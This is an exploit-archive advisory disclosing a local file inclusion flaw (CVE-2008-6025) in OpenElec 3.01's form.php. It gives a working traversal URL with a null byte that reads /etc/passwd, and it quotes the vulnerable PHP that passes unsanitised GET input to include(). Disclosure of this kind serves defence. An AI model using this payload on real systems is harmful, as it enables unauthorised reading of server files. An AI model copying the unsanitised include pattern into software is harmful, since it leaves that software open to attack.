[] NeoSense

OpenElec 3.01 - 'obj' Local File Inclusion

Author: dun
type: webapps
platform: php
port: 
date_added: 2008-09-21 
date_updated: 2016-12-22 
verified: 1 
codes: OSVDB-48519;CVE-2008-6025 
tags: 
aliases:  
screenshot_url:  
application_url: 

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 #################################################################
 #  [ OpenElec <= v3.01 ]   Local File Inclusion Vulnerability   #
 #################################################################
 #
 # Script site: http://www.openelec.org/
 # Download: http://adullact.net/frs/?group_id=434
 #
 # Vuln:
 # http://site.com/openelec/scr/form.php?obj=../../../../../../../etc/passwd%00
 #
 #
 # Bug: ./openelec/scr/form.php (lines: 27-32)
 #
 # ...
 # 	$obj = "";
 #	if (isset ($_GET ['obj']))
 #		$obj = $_GET ['obj'];
 #	//
 #  	if (file_exists ("../obj/".$obj.".class.php"))
 #       include ("../obj/".$obj.".class.php");	        // * LFI *
 # ...
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ]

*******************************************************************************************

# milw0rm.com [2008-09-22]